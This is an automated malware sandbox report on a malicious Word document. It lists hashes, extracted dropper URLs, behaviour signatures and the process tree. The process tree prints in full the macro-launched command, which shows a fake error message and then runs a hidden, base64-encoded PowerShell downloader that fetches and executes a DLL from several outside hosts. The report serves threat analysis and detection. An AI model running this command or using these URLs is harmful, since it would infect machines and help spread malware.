Analysis

  • max time kernel
    139s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-01-2021 09:31

General

  • Target

    e5fc03b4e3a35dc4ecb66fecaf41bf2f410f65102a8d3c6ba998d699d5d2c864.doc

  • Size

    87KB

  • MD5

    3ab2daf32a000abd8a5dc328235f51f9

  • SHA1

    d6dca90e6b8e05a9aff966becf5d3b9fea0256fc

  • SHA256

    e5fc03b4e3a35dc4ecb66fecaf41bf2f410f65102a8d3c6ba998d699d5d2c864

  • SHA512

    9cff3d95de479d3a48adbc1e1a4ad7dacbbf0d0f27cb6276e39da38a4bcea383f20a79feb0fee1d19d5f8c09941e8e648741e208d6655e688d51d6b37c2be480

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://globalruraldevelopmentagency.co.za/cgi-bin/inf/

exe.dropper

https://trioconcuerda.es/cgi-bin/Services/

exe.dropper

http://abbc.tv/wp-content/Triedit/

exe.dropper

http://asafina.co/wp-content/G3GLLO/

exe.dropper

http://bluepassgt.com/von-weise-ludzp/DNNXcQcRTT/

exe.dropper

http://larissarobles.com/wp-admin/SIGNUP/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e5fc03b4e3a35dc4ecb66fecaf41bf2f410f65102a8d3c6ba998d699d5d2c864.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:640
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2600
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:2372
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABzAEUAdAAtAGkAdABlAG0AIAAoACcAdgBhAHIAaQBBACcAKwAnAGIAbABFACcAKwAnADoAOAAnACsAJwBUAEsAbQAwACcAKQAgACgAIAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBvACcALAAnAHMAeQAnACwAJwBSAFkAJwAsACcAUwBUAGUATQAuAGkAbwAuAGQAaQBSAEUAYwBUACcAKQAgACAAKQA7ACAAJABvAFAANgBrAGkAPQAgAFsAdABZAHAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADEAfQB7ADYAfQB7ADAAfQB7ADUAfQB7ADMAfQAiACAALQBGACcAdAAnACwAJwBDAEUAcAAnACwAJwBTAHkAUwB0AGUAbQAuACcALAAnAEEAZwBlAHIAJwAsACcAbgBFAFQALgBTAGUAUgB2AEkAJwAsACcAbQBBAE4AJwAsACcATwBJAG4AJwApACAAOwAgACQAQwB3ADYAXwBqAHMANwA9ACQAUQAzADQAUQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASAA3ADkATQA7ACQATQBfADIATgA9ACgAKAAnAFkAMgAnACsAJwAzACcAKQArACcATQAnACkAOwAgACgAIAAgAGcAZQBUAC0ASQB0AGUAbQAgACAAKAAnAFYAQQBSAGkAYQAnACsAJwBiAEwARQAnACsAJwA6ADgAJwArACcAdABLAG0AMAAnACkAIAAgACkALgB2AEEATAB1AGUAOgA6ACIAQwBSAEUAYQBgAFQAYABlAGAAZABgAGkAUgBFAEMAdABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAcAAnACsAJwBVAEEARgByACcAKQArACcAdgAnACsAJwAzAHAAJwArACgAJwAzADUAcAAnACsAJwBVAEEATgAnACsAJwB0AHcAJwApACsAJwBoACcAKwAoACcAYQAnACsAJwBnAGkAcAAnACkAKwAnAFUAQQAnACkALQByAGUAUABMAGEAYwBlACAAIAAoAFsAQwBoAEEAcgBdADEAMQAyACsAWwBDAGgAQQByAF0AOAA1ACsAWwBDAGgAQQByAF0ANgA1ACkALABbAEMAaABBAHIAXQA5ADIAKQApADsAJABPAF8AMABaAD0AKAAoACcARwAxACcAKwAnADkAJwApACsAJwBMACcAKQA7ACAAIAAoACAAIABWAGEAUgBJAEEAYgBMAEUAIAAoACcATwAnACsAJwBQADYASwBpACcAKQAgACAAKQAuAFYAQQBsAFUARQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAeQBQAGAAUgBPAHQAbwBgAGMATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAMQAnACsAJwAyACcAKQApADsAJABIAF8ANQBJAD0AKAAoACcAQgAzACcAKwAnADMAJwApACsAJwBaACcAKQA7ACQAVABzADMAdwBsAGIANAAgAD0AIAAoACcAVwAnACsAKAAnADkAJwArACcANABDACcAKQApADsAJABYADUAMQBUAD0AKAAoACcAQwAnACsAJwA5ADgAJwApACsAJwBWACcAKQA7ACQATABhAF8AeQA3AGUAMQA9ACQASABPAE0ARQArACgAKAAoACcATgBPAEgARgByAHYAJwArACcAMwAnACkAKwAoACcAcAAzACcAKwAnADUATgAnACkAKwAnAE8AJwArACgAJwBIACcAKwAnAE4AdAAnACsAJwB3AGgAYQBnAGkAJwApACsAJwBOACcAKwAnAE8AJwArACcASAAnACkALgAiAHIAZQBQAGwAYABBAGMAZQAiACgAKAAnAE4ATwAnACsAJwBIACcAKQAsACcAXAAnACkAKQArACQAVABzADMAdwBsAGIANAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFIANAA0AFkAPQAoACcARgAwACcAKwAnADQAVwAnACkAOwAkAFIAbQBzAGMAZgB0ADkAPQAoACcAQQBdACcAKwAoACcAWwBxAFsAJwArACcARAAnACkAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwBnACcAKQArACgAJwBsAG8AJwArACcAYgBhAGwAcgAnACsAJwB1ACcAKQArACgAJwByAGEAbAAnACsAJwBkAGUAdgBlAGwAJwApACsAKAAnAG8AJwArACcAcABtACcAKQArACgAJwBlAG4AJwArACcAdAAnACkAKwAoACcAYQAnACsAJwBnAGUAbgBjAHkALgAnACkAKwAnAGMAbwAnACsAKAAnAC4AegBhAC8AYwAnACsAJwBnACcAKQArACcAaQAnACsAKAAnAC0AJwArACcAYgBpAG4AJwApACsAKAAnAC8AJwArACcAaQBuAGYALwAnACkAKwAnAEAAJwArACgAJwBBAF0AWwBxAFsAJwArACcARAAnACsAJwBzADoALwAvACcAKQArACcAdAAnACsAJwByACcAKwAoACcAaQBvAGMAbwBuACcAKwAnAGMAdQAnACsAJwBlACcAKQArACcAcgAnACsAKAAnAGQAJwArACcAYQAuACcAKQArACcAZQAnACsAJwBzAC8AJwArACgAJwBjACcAKwAnAGcAaQAnACkAKwAoACcALQBiACcAKwAnAGkAJwArACcAbgAvAFMAJwArACcAZQByAHYAaQBjACcAKQArACcAZQAnACsAJwBzAC8AJwArACcAQAAnACsAJwBBACcAKwAoACcAXQBbACcAKwAnAHEAWwAnACkAKwAnAEQAJwArACgAJwA6AC8AJwArACcALwAnACkAKwAnAGEAJwArACcAYgAnACsAKAAnAGIAJwArACcAYwAuAHQAJwApACsAJwB2AC8AJwArACcAdwBwACcAKwAoACcALQBjACcAKwAnAG8AJwArACcAbgB0AGUAJwApACsAKAAnAG4AdAAnACsAJwAvACcAKwAnAFQAcgAnACsAJwBpAGUAZABpAHQAJwApACsAKAAnAC8AQABBACcAKwAnAF0AWwAnACkAKwAoACcAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAvACcAKwAnAGEAcwBhACcAKwAnAGYAaQAnACkAKwAnAG4AYQAnACsAJwAuACcAKwAoACcAYwBvACcAKwAnAC8AdwBwACcAKQArACcALQBjACcAKwAnAG8AbgAnACsAJwB0ACcAKwAoACcAZQAnACsAJwBuAHQAJwArACcALwBHADMARwBMAEwAJwArACcATwAnACkAKwAoACcALwBAACcAKwAnAEEAJwApACsAKAAnAF0AWwAnACsAJwBxAFsARAA6AC8AJwApACsAKAAnAC8AYgBsACcAKwAnAHUAJwApACsAKAAnAGUAJwArACcAcABhACcAKQArACcAcwBzACcAKwAnAGcAdAAnACsAJwAuACcAKwAnAGMAJwArACgAJwBvACcAKwAnAG0ALwB2ACcAKQArACgAJwBvAG4AJwArACcALQB3AGUAaQBzAGUALQAnACsAJwBsACcAKQArACcAdQBkACcAKwAoACcAegAnACsAJwBwAC8AJwApACsAKAAnAEQATgBOAFgAYwAnACsAJwBRAGMAJwArACcAUgBUACcAKQArACgAJwBUACcAKwAnAC8AQAAnACkAKwAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwA6ACcAKwAoACcALwAvACcAKwAnAGwAJwApACsAKAAnAGEAcgBpACcAKwAnAHMAcwBhACcAKwAnAHIAbwBiACcAKQArACcAbAAnACsAJwBlAHMAJwArACcALgBjACcAKwAoACcAbwBtAC8AJwArACcAdwBwAC0AYQBkAG0AaQAnACsAJwBuAC8AUwBJAEcATgAnACsAJwBVAFAAJwArACcALwAnACkAKQAuACIAcgBFAGAAUABMAGEAYwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAKAAnAGQAJwArACcAcwBlACcAKQArACcAdwBmACcAKQAsACgAKAAnAHcAZQAnACsAJwB2ACcAKQArACcAdwBlACcAKQApACwAKAAnAGEAZQAnACsAJwBmAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAUwBQAGAATABpAFQAIgAoACQATgA2ADkARQAgACsAIAAkAEMAdwA2AF8AagBzADcAIAArACAAJABVADAANABPACkAOwAkAFQAOAAwAFIAPQAoACcAVwAnACsAKAAnADEAMQAnACsAJwBVACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABWAGsAeQB2AHUAXwByACAAaQBuACAAJABSAG0AcwBjAGYAdAA5ACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcALQAnACsAJwBPACcAKwAnAGIAagBlAGMAdAAnACkAIABzAFkAcwBUAGUAbQAuAE4ARQB0AC4AdwBFAEIAYwBsAGkARQBOAHQAKQAuACIARABPAGAAdwBOAGwATwBhAGQAYABGAGkAYABsAGUAIgAoACQAVgBrAHkAdgB1AF8AcgAsACAAJABMAGEAXwB5ADcAZQAxACkAOwAkAE4AMwA3AEoAPQAoACgAJwBVADAAJwArACcANAAnACkAKwAnAEwAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAEwAYQBfAHkANwBlADEAKQAuACIAbABgAEUAYABOAEcAdABoACIAIAAtAGcAZQAgADQAMwA3ADMAMAApACAAewAmACgAJwByAHUAbgAnACsAJwBkAGwAJwArACcAbAAzADIAJwApACAAJABMAGEAXwB5ADcAZQAxACwAKAAoACcAUwBoAG8AJwArACcAdwAnACsAJwBEAGkAJwApACsAJwBhACcAKwAoACcAbABvACcAKwAnAGcAQQAnACkAKQAuACIAdABgAG8AYABTAFQAUgBpAG4AZwAiACgAKQA7ACQATQA1ADEAVQA9ACgAJwBQADAAJwArACcAMQBXACcAKQA7AGIAcgBlAGEAawA7ACQATQAyADQARgA9ACgAJwBMACcAKwAoACcAOAAnACsAJwAyAFIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANgA0AE0APQAoACcAWQAnACsAKAAnADYANgAnACsAJwBZACcAKQApAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2680
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3724
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3812
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Etqegkn\zlirsy.yxz",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:3940

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Frv3p35\Ntwhagi\W94C.dll
      MD5

      76830a17ada93e706fba394247dbf7e2

      SHA1

      073d99bbbecd6a5796cb9275913bcca98c78d98f

      SHA256

      3ffb5575530438b6a599583d7d67ba20447f12df4d6b064967ddefc060583a7b

      SHA512

      33ad02b11bc1b5be2b3f473848d77d65afdb481671d58f44f8100a9b1d478d2a9227196a2f0cf48e15ec8b667efd459adca2360612c8f5470b5e99056461d0b9

    • \Users\Admin\Frv3p35\Ntwhagi\W94C.dll
      MD5

      76830a17ada93e706fba394247dbf7e2

      SHA1

      073d99bbbecd6a5796cb9275913bcca98c78d98f

      SHA256

      3ffb5575530438b6a599583d7d67ba20447f12df4d6b064967ddefc060583a7b

      SHA512

      33ad02b11bc1b5be2b3f473848d77d65afdb481671d58f44f8100a9b1d478d2a9227196a2f0cf48e15ec8b667efd459adca2360612c8f5470b5e99056461d0b9

    • memory/640-2-0x00000292209D0000-0x0000029221007000-memory.dmp
      Filesize

      6.2MB

    • memory/2372-3-0x0000000000000000-mapping.dmp
    • memory/2680-4-0x0000000000000000-mapping.dmp
    • memory/2680-5-0x00007FFC29430000-0x00007FFC29E1C000-memory.dmp
      Filesize

      9.9MB

    • memory/2680-6-0x000001CB5C890000-0x000001CB5C891000-memory.dmp
      Filesize

      4KB

    • memory/2680-7-0x000001CB74BE0000-0x000001CB74BE1000-memory.dmp
      Filesize

      4KB

    • memory/3724-8-0x0000000000000000-mapping.dmp
    • memory/3812-10-0x0000000000000000-mapping.dmp
    • memory/3940-12-0x0000000000000000-mapping.dmp